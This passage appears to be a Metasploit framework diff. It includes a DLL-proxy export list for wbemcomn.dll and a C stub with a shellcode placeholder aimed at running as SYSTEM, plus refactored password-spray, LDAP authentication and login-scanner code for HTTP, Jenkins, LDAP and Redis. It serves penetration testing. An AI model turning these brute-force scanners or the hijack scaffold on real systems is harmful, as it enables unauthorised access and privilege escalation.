+    ?trailing_or_null@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?trailing_or_null@CAbstractQl1Parser@@IEAAHXZ @1395
+    ?trailing_prop_expr@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?trailing_prop_expr@CAbstractQl1Parser@@IEAAHXZ @1396
+    ?typed_constant@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?typed_constant@CAbstractQl1Parser@@IEAAHXZ @1397
+    AdjustPrivIfLocalSystem=C:/Windows/System32/wbemcomn.AdjustPrivIfLocalSystem @492
+    BlobAssign=C:/Windows/System32/wbemcomn.BlobAssign @504
+    BlobClear=C:/Windows/System32/wbemcomn.BlobClear @505
+    BlobCopy=C:/Windows/System32/wbemcomn.BlobCopy @506
+    BreakOnDbgAndRenterLoop=C:/Windows/System32/wbemcomn.BreakOnDbgAndRenterLoop @507
+    BuildOperationInfo=C:/Windows/System32/wbemcomn.BuildOperationInfo @509
+    BuildSecurityDescriptorParameter=C:/Windows/System32/wbemcomn.BuildSecurityDescriptorParameter @511
+    ChangeVariantToCIMTYPE=C:/Windows/System32/wbemcomn.ChangeVariantToCIMTYPE @518
+    ComposeName=C:/Windows/System32/wbemcomn.ComposeName @542
+    CopyFileToAutorecover=C:/Windows/System32/wbemcomn.CopyFileToAutorecover @554
+    CriticalFailADAPTrace=C:/Windows/System32/wbemcomn.CriticalFailADAPTrace @561
+    DebugTrace=C:/Windows/System32/wbemcomn.DebugTrace @580
+    DumpClientOps=C:/Windows/System32/wbemcomn.DumpClientOps @601
+    EnableAllPrivileges=C:/Windows/System32/wbemcomn.EnableAllPrivileges @614
+    EnablePrivilege=C:/Windows/System32/wbemcomn.EnablePrivilege @615
+    ErrorTrace=C:/Windows/System32/wbemcomn.ErrorTrace @637
+    ExtractMachineName=C:/Windows/System32/wbemcomn.ExtractMachineName @643
+    GetAccessToken=C:/Windows/System32/wbemcomn.GetAccessToken @664
+    GetFQDN_Ipv4=C:/Windows/System32/wbemcomn.GetFQDN_Ipv4 @720
+    GetGlobalClientOps=C:/Windows/System32/wbemcomn.GetGlobalClientOps @730
+    GetLoggingLevelEnabled=C:/Windows/System32/wbemcomn.GetLoggingLevelEnabled @753
+    GetMemLogObject=C:/Windows/System32/wbemcomn.GetMemLogObject @756
+    GetQFDN_Ipv6=C:/Windows/System32/wbemcomn.GetQFDN_Ipv6 @789
+    GetSecurityDescriptorFromParameters=C:/Windows/System32/wbemcomn.GetSecurityDescriptorFromParameters @810
+    GetWMIADAPCmdLine=C:/Windows/System32/wbemcomn.GetWMIADAPCmdLine @865
+    GetWMITraceSession=C:/Windows/System32/wbemcomn.GetWMITraceSession @866
+    Get_WPP_INIT_TRACING_Call_State=C:/Windows/System32/wbemcomn.Get_WPP_INIT_TRACING_Call_State @871
+    IsAdmin=C:/Windows/System32/wbemcomn.IsAdmin @903
+    IsInAdminGroup=C:/Windows/System32/wbemcomn.IsInAdminGroup @918
+    IsLocalConnection=C:/Windows/System32/wbemcomn.IsLocalConnection @921
+    IsLocalService=C:/Windows/System32/wbemcomn.IsLocalService @922
+    IsNT=C:/Windows/System32/wbemcomn.IsNT @923
+    IsNetworkService=C:/Windows/System32/wbemcomn.IsNetworkService @924
+    IsNtSetupRunning=C:/Windows/System32/wbemcomn.IsNtSetupRunning @925
+    IsPrivilegePresent=C:/Windows/System32/wbemcomn.IsPrivilegePresent @930
+    IsValidElementName=C:/Windows/System32/wbemcomn.IsValidElementName @947
+    IsValidElementName2=C:/Windows/System32/wbemcomn.IsValidElementName2 @946
+    IsW2KOrMore=C:/Windows/System32/wbemcomn.IsW2KOrMore @957
+    LoggingLevelEnabled=C:/Windows/System32/wbemcomn.LoggingLevelEnabled @975
+    NormalizeCimDateTime=C:/Windows/System32/wbemcomn.NormalizeCimDateTime @988
+    ReadI64=C:/Windows/System32/wbemcomn.ReadI64 @1031
+    ReadUI64=C:/Windows/System32/wbemcomn.ReadUI64 @1033
+    RegisterDLL=C:/Windows/System32/wbemcomn.RegisterDLL @1039
+    RegisterDllAppid=C:/Windows/System32/wbemcomn.RegisterDllAppid @1040
+    RemoveFileFromAutoRecoverFolder=C:/Windows/System32/wbemcomn.RemoveFileFromAutoRecoverFolder @1058
+    RetrieveSidFromCall=C:/Windows/System32/wbemcomn.RetrieveSidFromCall @1075
+    RetrieveSidFromToken=C:/Windows/System32/wbemcomn.RetrieveSidFromToken @1076
+    SetObjectAccess2=C:/Windows/System32/wbemcomn.SetObjectAccess2 @1154
+    SetWMITraceSession=C:/Windows/System32/wbemcomn.SetWMITraceSession @1192
+    Set_WPP_INIT_TRACING_Call_State=C:/Windows/System32/wbemcomn.Set_WPP_INIT_TRACING_Call_State @1195
+    TestDirExistAndCreateWithSDIfNotThere=C:/Windows/System32/wbemcomn.TestDirExistAndCreateWithSDIfNotThere @1223
+    Throttle=C:/Windows/System32/wbemcomn.Throttle @1225
+    UnRegisterDLL=C:/Windows/System32/wbemcomn.UnRegisterDLL @1252
+    UnregisterDllAppid=C:/Windows/System32/wbemcomn.UnregisterDllAppid @1271
+    WMIControlCallback=C:/Windows/System32/wbemcomn.WMIControlCallback @1274
+    WMIControlClientOpsCallback=C:/Windows/System32/wbemcomn.WMIControlClientOpsCallback @1275
+    WbemGetMachineShutdown=C:/Windows/System32/wbemcomn.WbemGetMachineShutdown @1279
+    WbemSetDynamicCloaking=C:/Windows/System32/wbemcomn.WbemSetDynamicCloaking @1287
+    WbemSetMachineShutdown=C:/Windows/System32/wbemcomn.WbemSetMachineShutdown @1288
+    WbemVariantChangeType=C:/Windows/System32/wbemcomn.WbemVariantChangeType @1295
+    WinPEKey=C:/Windows/System32/wbemcomn.WinPEKey @1297
+    _DoTraceHRFailure_=C:/Windows/System32/wbemcomn._DoTraceHRFailure_ @1304
+    _IsValidElementName=C:/Windows/System32/wbemcomn._IsValidElementName @1309
+    _ThrowMemoryException_=C:/Windows/System32/wbemcomn._ThrowMemoryException_ @1315
+    bAreWeLocal=C:/Windows/System32/wbemcomn.bAreWeLocal @1321
+    isunialpha=C:/Windows/System32/wbemcomn.isunialpha @1335
+    isunialphanum=C:/Windows/System32/wbemcomn.isunialphanum @1336
+    mstatic_dwTlsIndex=C:/Windows/System32/wbemcomn.mstatic_dwTlsIndex @1372
@@ -0,0 +1,12 @@
+#define SCSIZE 2048
+unsigned char code[SCSIZE] = "PAYLOAD:";
+
+typedef struct {
+	HANDLE hModule;
+	HANDLE hMutex;
+	HANDLE hProcess;
+} EXPLOIT_DATA, *PEXPLOIT_DATA;
+
+#define SIDSTR_SYSTEM _T("s-1-5-18")
+#define IsProcessRunningAsSystem(hProc, bResult) IsProcessRunningAsSidString(hProc, SIDSTR_SYSTEM, bResult)
+
@@ -11,7 +11,6 @@ require 'json'
 require 'msgpack'
 require 'metasploit/credential'
 require 'nokogiri'
-require 'packetfu'
 # railties has not autorequire defined
 # rkelly-remix is a fork of rkelly, so it's autorequire is 'rkelly' and not 'rkelly-remix'
 require 'rkelly'
@@ -88,18 +88,10 @@ module Metasploit::Framework
    # @yieldparam credential [Metasploit::Framework::Credential]
    # @return [void]
    def each_filtered
-      if password_spray
-        each_unfiltered_password_first do |credential|
-          next unless self.filter.nil? || self.filter.call(credential)
+      each_unfiltered do |credential|
+        next unless self.filter.nil? || self.filter.call(credential)

-          yield credential
-        end
-      else
-        each_unfiltered_username_first do |credential|
-          next unless self.filter.nil? || self.filter.call(credential)
-
-          yield credential
-        end
+        yield credential
      end
    end

@@ -121,6 +113,9 @@ module Metasploit::Framework
      if blank_passwords
        yield Metasploit::Framework::Credential.new(private: "", realm: realm, private_type: :password)
      end
+      if nil_passwords
+        yield Metasploit::Framework::Credential.new(private: nil, realm: realm, private_type: :password)
+      end
      if pass_fd
        pass_fd.each_line do |pass_from_file|
          pass_from_file.chomp!
@@ -177,6 +172,12 @@ module Metasploit::Framework
  end

  class CredentialCollection < PrivateCredentialCollection
+    # @!attribute password_spray
+    #   Whether password spray is enabled. When true, each password is tried against each username first.
+    #   Otherwise the default bruteforce logic will attempt all passwords against the first user, before
+    #   continuing to the next user
+    #
+    #   @return [Boolean]
    attr_accessor :password_spray

    # @!attribute additional_publics
@@ -233,6 +234,29 @@ module Metasploit::Framework
      additional_publics << public_str
    end

+    # Combines all the provided credential sources into a stream of {Credential}
+    # objects, yielding them one at a time
+    #
+    # @yieldparam credential [Metasploit::Framework::Credential]
+    # @return [void]
+    def each_filtered
+      if password_spray
+        each_unfiltered_password_first do |credential|
+          next unless self.filter.nil? || self.filter.call(credential)
+
+          yield credential
+        end
+      else
+        each_unfiltered_username_first do |credential|
+          next unless self.filter.nil? || self.filter.call(credential)
+
+          yield credential
+        end
+      end
+    end
+
+    alias each each_filtered
+
    # When password spraying is enabled, do first passwords then usernames
    #  i.e.
    #   username1:password1
@@ -282,19 +306,19 @@ module Metasploit::Framework
        File.open(pass_file, 'r:binary') do |pass_fd|
          pass_fd.each_line do |pass_from_file|
            pass_from_file.chomp!
+            if username.present?
+              yield Metasploit::Framework::Credential.new(public: username, private: pass_from_file, realm: realm, private_type: :password)
+            end
            if user_as_pass
              yield Metasploit::Framework::Credential.new(public: pass_from_file, private: pass_from_file, realm: realm, private_type: :password)
            end
-            if user_fd
-              user_fd.each_line do |user_from_file|
-                user_from_file.chomp!
-                yield Metasploit::Framework::Credential.new(public: user_from_file, private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
-              end
-              user_fd.seek(0)
-            end
-            additional_privates.each do |add_private|
-              yield Metasploit::Framework::Credential.new(public: user_from_file, private: add_private, realm: realm, private_type: private_type(add_private))
+            next unless user_fd
+
+            user_fd.each_line do |user_from_file|
+              user_from_file.chomp!
+              yield Metasploit::Framework::Credential.new(public: user_from_file, private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
            end
+            user_fd.seek(0)
          end
        end
      end
@@ -313,6 +337,17 @@ module Metasploit::Framework
        end
      end

+      additional_privates.each do |add_private|
+        if username.present?
+          yield Metasploit::Framework::Credential.new(public: username, private: add_private, realm: realm, private_type: private_type(add_private))
+        end
+        user_fd.each_line do |user_from_file|
+          user_from_file.chomp!
+          yield Metasploit::Framework::Credential.new(public: user_from_file, private: add_private, realm: realm, private_type: private_type(add_private))
+        end
+        user_fd.seek(0)
+      end
+
      additional_publics.each do |add_public|
        if password.present?
          yield Metasploit::Framework::Credential.new(public: add_public, private: password, realm: realm, private_type: private_type(password) )
@@ -323,6 +358,9 @@ module Metasploit::Framework
        if blank_passwords
          yield Metasploit::Framework::Credential.new(public: add_public, private: "", realm: realm, private_type: :password)
        end
+        if nil_passwords
+          yield Metasploit::Framework::Credential.new(public: add_public, private: nil, realm: realm, private_type: :password)
+        end
        if user_fd
          user_fd.each_line do |user_from_file|
            user_from_file.chomp!
@@ -1,5 +1,7 @@
 # frozen_string_literal: true

+require 'rex/proto/ldap/auth_adapter'
+
 module Metasploit
  module Framework
    module LDAP
@@ -24,18 +26,16 @@ module Metasploit

          case opts[:ldap_auth]
          when Msf::Exploit::Remote::AuthOption::SCHANNEL
-            raise Msf::ValidationError, 'The SSL option must be enabled when using SCHANNEL authentication.' unless ssl
-
-            connect_opts.merge!(ldap_auth_opts_scahnnel(opts))
+            connect_opts.merge!(ldap_auth_opts_schannel(opts, ssl))
          when Msf::Exploit::Remote::AuthOption::KERBEROS
-            connect_opts.merge!(ldap_auth_opts_kerberos(opts))
+            connect_opts.merge!(ldap_auth_opts_kerberos(opts, ssl))
          when Msf::Exploit::Remote::AuthOption::NTLM
-            connect_opts.merge!(ldap_auth_opts_ntlm(opts))
+            connect_opts.merge!(ldap_auth_opts_ntlm(opts, ssl))
          when Msf::Exploit::Remote::AuthOption::PLAINTEXT
            connect_opts.merge!(ldap_auth_opts_plaintext(opts))
          when Msf::Exploit::Remote::AuthOption::AUTO
            if opts[:username].present? && opts[:domain].present?
-              connect_opts.merge!(ldap_auth_opts_ntlm(opts))
+              connect_opts.merge!(ldap_auth_opts_ntlm(opts, ssl))
            elsif opts[:username].present?
              connect_opts.merge!(ldap_auth_opts_plaintext(opts))
            end
@@ -46,14 +46,15 @@ module Metasploit

        private

-        def ldap_auth_opts_kerberos(opts)
+        def ldap_auth_opts_kerberos(opts, ssl)
          auth_opts = {}
-          raise Msf::ValidationError, 'The Ldap::Rhostname option is required when using Kerberos authentication.' if opts[:ldap_rhostname].blank?
+          raise Msf::ValidationError, 'The LDAP::Rhostname option is required when using Kerberos authentication.' if opts[:ldap_rhostname].blank?
          raise Msf::ValidationError, 'The DOMAIN option is required when using Kerberos authentication.' if opts[:domain].blank?

          offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(opts[:ldap_krb_offered_enc_types])
          raise Msf::ValidationError, 'At least one encryption type is required when using Kerberos authentication.' if offered_etypes.empty?

+          sign_and_seal = opts.fetch(:sign_and_seal, !ssl)
          kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP.new(
            host: opts[:domain_controller_rhost].blank? ? nil : opts[:domain_controller_rhost],
            hostname: opts[:ldap_rhostname],
@@ -64,58 +65,41 @@ module Metasploit
            framework_module: opts[:framework_module],
            cache_file: opts[:ldap_krb5_cname].blank? ? nil : opts[:ldap_krb5_cname],
            ticket_storage: opts[:kerberos_ticket_storage],
-            offered_etypes: offered_etypes
+            offered_etypes: offered_etypes,
+            mutual_auth: true,
+            use_gss_checksum: sign_and_seal || ssl
          )

          auth_opts[:auth] = {
-            method: :sasl,
-            mechanism: 'GSS-SPNEGO',
-            initial_credential: proc do
-              kerberos_result = kerberos_authenticator.authenticate
-              kerberos_result[:security_blob]
-            end,
-            challenge_response: true
+            method: :rex_kerberos,
+            kerberos_authenticator: kerberos_authenticator,
+            sign_and_seal: sign_and_seal
          }
+
          auth_opts
        end

-        def ldap_auth_opts_ntlm(opts)
+        def ldap_auth_opts_ntlm(opts, ssl)
          auth_opts = {}
-          ntlm_client = RubySMB::NTLM::Client.new(
-            (opts[:username].nil? ? '' : opts[:username]),
-            (opts[:password].nil? ? '' : opts[:password]),
-            workstation: 'WORKSTATION',
-            domain: opts[:domain].blank? ? '.' : opts[:domain],
-            flags:
-              RubySMB::NTLM::NEGOTIATE_FLAGS[:UNICODE] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:REQUEST_TARGET] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:NTLM] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:ALWAYS_SIGN] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:EXTENDED_SECURITY] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:KEY_EXCHANGE] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:TARGET_INFO] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:VERSION_INFO]
-          )
-
-          negotiate = proc do |challenge|
-            ntlmssp_offset = challenge.index('NTLMSSP')
-            type2_blob = challenge.slice(ntlmssp_offset..-1)
-            challenge = [type2_blob].pack('m')
-            type3_message = ntlm_client.init_context(challenge)
-            type3_message.serialize
-          end

          auth_opts[:auth] = {
-            method: :sasl,
-            mechanism: 'GSS-SPNEGO',
-            initial_credential: ntlm_client.init_context.serialize,
-            challenge_response: negotiate
+            # use the rex one provided by us to support TLS channel binding (see: ruby-ldap/ruby-net-ldap#407) and blank
+            # passwords (see: WinRb/rubyntlm#45)
+            method: :rex_ntlm,
+            username: opts[:username],
+            password: opts[:password],
+            domain: opts[:domain],
+            workstation: 'WORKSTATION',
+            sign_and_seal: opts.fetch(:sign_and_seal, !ssl)
          }
+
          auth_opts
        end

        def ldap_auth_opts_plaintext(opts)
          auth_opts = {}
+          raise Msf::ValidationError, 'Can not sign and seal when using Plaintext authentication.' if opts.fetch(:sign_and_seal, false)
+
          auth_opts[:auth] = {
            method: :simple,
            username: opts[:username],
@@ -124,10 +108,12 @@ module Metasploit
          auth_opts
        end

-        def ldap_auth_opts_scahnnel(opts)
+        def ldap_auth_opts_schannel(opts, ssl)
          auth_opts = {}
          pfx_path = opts[:ldap_cert_file]
-          raise Msf::ValidationError, 'The LDAP::CertFile option is required when using SCHANNEL authentication.' if pfx_path.blank?
+          raise Msf::ValidationError, 'The SSL option must be enabled when using Schannel authentication.' unless ssl
+          raise Msf::ValidationError, 'The LDAP::CertFile option is required when using Schannel authentication.' if pfx_path.blank?
+          raise Msf::ValidationError, 'Can not sign and seal when using Schannel authentication.' if opts.fetch(:sign_and_seal, false)

          unless ::File.file?(pfx_path) && ::File.readable?(pfx_path)
            raise Msf::ValidationError, 'Failed to load the PFX certificate file. The path was not a readable file.'
@@ -252,7 +252,15 @@ module Metasploit
                end
              end
            rescue => e
-              elog('Attempt may not yield a result', error: e)
+              if framework_module
+                prefix = framework_module.respond_to?(:peer) ? "#{framework_module.peer} - LOGIN FAILED:" : "LOGIN FAILED:"
+                framework_module.print_warning("#{prefix} #{credential.to_h} - Unhandled error - scan may not produce correct results: #{e.message} - #{e.backtrace}")
+              end
+              elog("Scan Error: #{e.message}", error: e)
+              consecutive_error_count += 1
+              total_error_count += 1
+              break if consecutive_error_count >= 3
+              break if total_error_count >= 10
            end
            nil
          end
@@ -1,4 +1,3 @@
-
 require 'metasploit/framework/login_scanner/base'
 require 'metasploit/framework/login_scanner/rex_socket'

@@ -12,14 +11,16 @@ module Metasploit
        include Metasploit::Framework::LoginScanner::Base
        include Metasploit::Framework::LoginScanner::RexSocket

-        DEFAULT_REALM        = nil
-        DEFAULT_PORT         = 80
-        DEFAULT_SSL_PORT     = 443
-        DEFAULT_HTTP_SUCCESS_CODES = [ 200, 201 ].append(*(300..309))
-        LIKELY_PORTS         = [ 80, 443, 8000, 8080 ]
-        LIKELY_SERVICE_NAMES = [ 'http', 'https' ]
-        PRIVATE_TYPES        = [ :password ]
-        REALM_KEY            = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+        AUTHORIZATION_HEADER = 'WWW-Authenticate'.freeze
+        DEFAULT_REALM = nil
+        DEFAULT_PORT = 80
+        DEFAULT_SSL_PORT = 443
+        DEFAULT_HTTP_SUCCESS_CODES = [200, 201].append(*(300..309))
+        DEFAULT_HTTP_NOT_AUTHED_CODES = [401]
+        LIKELY_PORTS = [80, 443, 8000, 8080]
+        LIKELY_SERVICE_NAMES = %w[http https]
+        PRIVATE_TYPES = [:password]
+        REALM_KEY = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN

        # @!attribute uri
        #   @return [String] The path and query string on the server to
@@ -213,16 +214,14 @@ module Metasploit
            # authentication
            response = http_client._send_recv(request)
          rescue ::EOFError, Errno::ETIMEDOUT, OpenSSL::SSL::SSLError, Rex::ConnectionError, ::Timeout::Error
-            return "Unable to connect to target"
+            return 'Unable to connect to target'
          end

-          if !(response && response.code == 401 && response.headers['WWW-Authenticate'])
-            error_message = "No authentication required"
-          else
-            error_message = false
+          if authentication_required?(response)
+            return false
          end

-          error_message
+          'No authentication required'
        end

        # Sends a HTTP request with Rex
@@ -252,7 +251,7 @@ module Metasploit
                  else
                    cli._send_recv(req)
                  end
-          rescue ::EOFError, Errno::ETIMEDOUT ,Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
+          rescue ::EOFError, Errno::ETIMEDOUT, Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
            raise Rex::ConnectionError, e.message
          ensure
            # If we didn't create the client, don't close it
@@ -315,18 +314,31 @@ module Metasploit
          Result.new(result_opts)
        end

+        protected
+
+        # Returns a boolean value indicating whether the request requires authentication or not.
+        #
+        # @param [Rex::Proto::Http::Response] response The response received from the HTTP endpoint
+        # @return [Boolean] True if the request required authentication; otherwise false.
+        def authentication_required?(response)
+          return false unless response
+
+          self.class::DEFAULT_HTTP_NOT_AUTHED_CODES.include?(response.code) &&
+            response.headers[self.class::AUTHORIZATION_HEADER]
+        end
+
        private

        def create_client(opts)
-          rhost           = opts['host'] || host
-          rport           = opts['rport'] || port
-          cli_ssl         = opts['ssl'] || ssl
+          rhost = opts['host'] || host
+          rport = opts['rport'] || port
+          cli_ssl = opts['ssl'] || ssl
          cli_ssl_version = opts['ssl_version'] || ssl_version
-          cli_proxies     = opts['proxies'] || proxies
-          username        = opts['credential'] ? opts['credential'].public : http_username
-          password        = opts['credential'] ? opts['credential'].private : http_password
-          realm           = opts['credential'] ? opts['credential'].realm : nil
-          context         = opts['context'] || { 'Msf' => framework, 'MsfExploit' => framework_module}
+          cli_proxies = opts['proxies'] || proxies
+          username = opts['credential'] ? opts['credential'].public : http_username
+          password = opts['credential'] ? opts['credential'].private : http_password
+          realm = opts['credential'] ? opts['credential'].realm : nil
+          context = opts['context'] || { 'Msf' => framework, 'MsfExploit' => framework_module}

          kerberos_authenticator = nil
          if kerberos_authenticator_factory
@@ -441,10 +453,22 @@ module Metasploit

        # Combine the base URI with the target URI in a sane fashion
        #
-        # @param [String] target_uri the target URL
+        # @param [Array<String>] target_uri the target URL
        # @return [String] the final URL mapped against the base
-        def normalize_uri(target_uri)
-          (self.uri.to_s + "/" + target_uri.to_s).gsub(/\/+/, '/')
+        def normalize_uri(*target_uri)
+          if target_uri.count == 1
+            (uri.to_s + '/' + target_uri.first.to_s).gsub(%r{/+}, '/')
+          else
+            new_str = target_uri * '/'
+            new_str = new_str.gsub!('//', '/') while new_str.index('//')
+
+            # Makes sure there's a starting slash
+            unless new_str[0,1] == '/'
+              new_str = '/' + new_str
+            end
+
+            new_str
+          end
        end

        private
@@ -5,21 +5,32 @@ module Metasploit
    module LoginScanner
      # Jenkins login scanner
      class Jenkins < HTTP
-
-        include Msf::Exploit::Remote::HTTP::Jenkins
-
        # Inherit LIKELY_PORTS,LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
        CAN_GET_SESSION = true
-        DEFAULT_PORT    = 8080
-        PRIVATE_TYPES   = [ :password ]
+        DEFAULT_HTTP_NOT_AUTHED_CODES = [403]
+        DEFAULT_PORT = 8080
+        PRIVATE_TYPES = [:password].freeze
+        LOGIN_PATH_REGEX = /action="(j_([a-z0-9_]+))"/
+
+        # Checks the setup for the Jenkins Login scanner.
+        #
+        # @return [String, false] Always returns false.
+        def check_setup
+          login_uri = jenkins_login_url
+
+          return 'Unable to locate the Jenkins login path' if login_uri.nil?
+
+          self.uri = normalize_uri(login_uri)
+
+          false
+        end

        # (see Base#set_sane_defaults)
        def set_sane_defaults
-          self.uri = "/j_acegi_security_check" if self.uri.nil?
-          self.method = "POST" if self.method.nil?
+          self.uri ||= '/'

-          if self.uri[0] != '/'
-            self.uri = "/#{self.uri}"
+          unless uri.to_s.start_with?('/')
+            self.uri = "/#{uri}"
          end

          super
@@ -27,29 +38,94 @@ module Metasploit

        def attempt_login(credential)
          result_opts = {
-              credential: credential,
-              host: host,
-              port: port,
-              protocol: 'tcp'
+            credential: credential,
+            host: host,
+            port: port,
+            protocol: 'tcp'
          }
+
          if ssl
            result_opts[:service_name] = 'https'
          else
            result_opts[:service_name] = 'http'
          end

-          status, proof = jenkins_login(credential.public, credential.private) do |request|
-            send_request({
-              'method' => method,
-              'uri' => uri,
-              'vars_post' => request['vars_post']
-            })
-          end
+          status, proof = jenkins_login(credential.public, credential.private)

          result_opts.merge!(status: status, proof: proof)

          Result.new(result_opts)
        end
+
+        protected
+
+        # Returns a boolean value indicating whether the request requires authentication or not.
+        #
+        # @param [Rex::Proto::Http::Response] response The response received from the HTTP endpoint
+        # @return [Boolean] True if the request required authentication; otherwise false.
+        def authentication_required?(response)
+          return false unless response
+
+          self.class::DEFAULT_HTTP_NOT_AUTHED_CODES.include?(response.code)
+        end
+
+        private
+
+        # This method takes a username and password and a target URI
+        # then attempts to login to Jenkins and will either fail with appropriate errors
+        #
+        # @param [String] username The username for login credentials
+        # @param [String] password The password for login credentials
+        # @return [Array] [status, proof] The result of the login attempt
+        def jenkins_login(username, password)
+          begin
+            res = send_request(
+              'method' => 'POST',
+              'uri' => self.uri,
+              'vars_post' => {
+                'j_username' => username,
+                'j_password' => password,
+                'Submit' => 'log in'
+              }
+            )
+
+            if res && res.headers['Location'] && !res.headers['Location'].include?('loginError')
+              status = Metasploit::Model::Login::Status::SUCCESSFUL
+              proof = res.headers
+            else
+              status = Metasploit::Model::Login::Status::INCORRECT
+              proof = res
+            end
+          rescue ::EOFError, Errno::ETIMEDOUT, Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
+            status = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            proof = e
+          end
+
+          [status, proof]
+        end
+
+        # This method uses the provided URI to determine whether login is possible for Jenkins.
+        # Based on the contents of the provided URI, the method looks for the login form and
+        # extracts the endpoint used to authenticate against.
+        #
+        # @return [String, nil] URI for successful login
+        def jenkins_login_url
+          response = send_request({ 'uri' => normalize_uri('login') })
+
+          if response&.code == 200 && response&.body =~ LOGIN_PATH_REGEX
+            return Regexp.last_match(1)
+          end
+
+          nil
+        end
+
+        # Determines whether the provided response is considered valid or not.
+        #
+        # @param [Rex::Proto::Http::Response, nil] response The response received from the HTTP request.
+        # @return [Boolean] True if the response if valid; otherwise false.
+        def valid_response?(response)
+          http_success_codes.include?(response&.code)
+        end
      end
    end
  end
@@ -11,8 +11,10 @@ module Metasploit
        include Metasploit::Framework::LDAP::Client
        include Msf::Exploit::Remote::LDAP

-        attr_accessor :opts
-        attr_accessor :realm_key
+        attr_accessor :opts, :realm_key
+        # @!attribute use_client_as_proof
+        #   @return [Boolean] If a login is successful and this attribute is true - an LDAP::Client instance is used as proof
+        attr_accessor :use_client_as_proof

        def attempt_login(credential)
          result_opts = {
@@ -36,17 +38,24 @@ module Metasploit
          }.merge(@opts)

          connect_opts = ldap_connect_opts(host, port, connection_timeout, ssl: opts[:ssl], opts: opts)
-          ldap_open(connect_opts) do |ldap|
-            return status_code(ldap.get_operation_result.table)
+          begin
+            ldap_client = ldap_open(connect_opts, keep_open: true)
+            return status_code(ldap_client)
          rescue StandardError => e
            { status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e }
          end
        end

-        def status_code(operation_result)
-          case operation_result[:code]
+        def status_code(ldap_client)
+          operation_result = ldap_client.get_operation_result.table[:code]
+          case operation_result
          when 0
-            { status: Metasploit::Model::Login::Status::SUCCESSFUL }
+            result = { status: Metasploit::Model::Login::Status::SUCCESSFUL }
+            if use_client_as_proof
+              result[:proof] = ldap_client
+              result[:connection] = ldap_client.socket
+            end
+            result
          else
            { status: Metasploit::Model::Login::Status::INCORRECT, proof: "Bind Result: #{operation_result}" }
          end
@@ -84,7 +93,6 @@ module Metasploit
              credential.public = "#{credential.public}@#{opts[:domain]}"
              yield credential
            end
-
          end
        end
      end
@@ -1,6 +1,7 @@
 require 'metasploit/framework/login_scanner/base'
 require 'metasploit/framework/login_scanner/rex_socket'
 require 'metasploit/framework/tcp/client'
+require 'rex/proto/redis'

 module Metasploit
  module Framework
@@ -9,21 +10,49 @@ module Metasploit
      # This is the LoginScanner class for dealing with REDIS.
      # It is responsible for taking a single target, and a list of credentials
      # and attempting them. It then saves the results.
-
      class Redis
        include Metasploit::Framework::LoginScanner::Base
        include Metasploit::Framework::LoginScanner::RexSocket
        include Metasploit::Framework::Tcp::Client

-        DEFAULT_PORT         = 6379
-        LIKELY_PORTS         = [ DEFAULT_PORT ]
-        LIKELY_SERVICE_NAMES = [ 'redis' ]
-        PRIVATE_TYPES        = [ :password ]
-        REALM_KEY            = nil
+        # Required to be able to invoke the scan! method from the included Base module.
+        # We do not use inheritance, so overwriting a method and relying on super does
+        # not work in this case.
+        alias parent_scan! scan!
+
+        DEFAULT_PORT          = 6379
+        LIKELY_PORTS          = [ DEFAULT_PORT ]
+        LIKELY_SERVICE_NAMES  = [ 'redis' ]
+        PRIVATE_TYPES         = [ :password ]
+        REALM_KEY             = nil
+
+        # Attempt to login with every {Credential credential} in
+        # {#cred_details}, by calling {#attempt_login} once for each.
+        #
+        # If a successful login is found for a user, no more attempts
+        # will be made for that user. If the scanner detects that no
+        # authentication is required, no further attempts will be made
+        # at all.
+        #
+        # @yieldparam result [Result] The {Result} object for each attempt
+        # @yieldreturn [void]
+        # @return [void]
+        def scan!(&block)
+          first_credential = to_enum(:each_credential).first
+          result = attempt_login(first_credential)
+          result.freeze
+
+          if result.status == Metasploit::Model::Login::Status::NO_AUTH_REQUIRED
+            yield result if block_given?
+          else
+            parent_scan!(&block)
+          end
+        end

        # This method can create redis command which can be read by redis server
        def redis_proto(command_parts)
          return if command_parts.blank?
+
          command = "*#{command_parts.length}\r\n"
          command_parts.each do |p|
            command << "$#{p.length}\r\n#{p}\r\n"
@@ -44,46 +73,95 @@ module Metasploit
            service_name: 'redis'
          }

-          disconnect if self.sock
+          disconnect if sock

          begin
            connect
            select([sock], nil, nil, 0.4)

-            command = redis_proto(['AUTH', "#{credential.private}"])
-            sock.put(command)
-            result_options[:proof] = sock.get_once
+            # Skip this call if we're dealing with an older redis version.
+            response = authenticate(credential.public.to_s, credential.private.to_s) unless @older_redis

-            # No password      - ( -ERR Client sent AUTH, but no password is set\r\n )
-            # Invalid password - ( -ERR invalid password\r\n )
-            # Valid password   - (+OK\r\n)
-
-            if result_options[:proof] && result_options[:proof] =~ /but no password is set/i
-              result_options[:status] = Metasploit::Model::Login::Status::NO_AUTH_REQUIRED
-            elsif result_options[:proof] && result_options[:proof] =~ /^-ERR invalid password/i
-              result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
-            elsif result_options[:proof] && result_options[:proof][/^\+OK/]
-              result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
